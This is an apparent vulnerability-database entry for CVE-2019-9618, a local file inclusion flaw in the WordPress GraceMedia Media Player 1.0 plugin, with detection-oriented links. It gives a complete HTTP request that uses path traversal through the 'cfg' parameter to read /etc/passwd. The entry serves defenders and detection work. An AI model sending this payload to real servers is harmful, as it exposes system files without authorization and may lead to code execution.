🔙 목록으로 돌아가기

CVE-2019-9618: WordPress GraceMedia Media Player 1.0 - Local File Inclusion

TitleWordPress GraceMedia Media Player 1.0 - Local File Inclusion
Authordaffainfo
SeverityCritical
ImpactAttackers can include arbitrary local files, potentially leading to information disclosure or code execution.
RemediationUpdate to the latest version of the plugin or apply security patches to sanitize the 'cfg' parameter.
CVSS Score9.8
EPSS Score0.88158
CVE IDCVE-2019-9618
CWE IDCWE-22
Tags cve cve2019 wordpress wp-plugin lfi seclists edb gracemedia_media_player_project vkev vuln

🔍 Vulnerability Description

WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.

🌐 HTTP Request

GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.16 (KHTML, like Gecko) Version/8.0 Safari/537.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9618.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9618.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A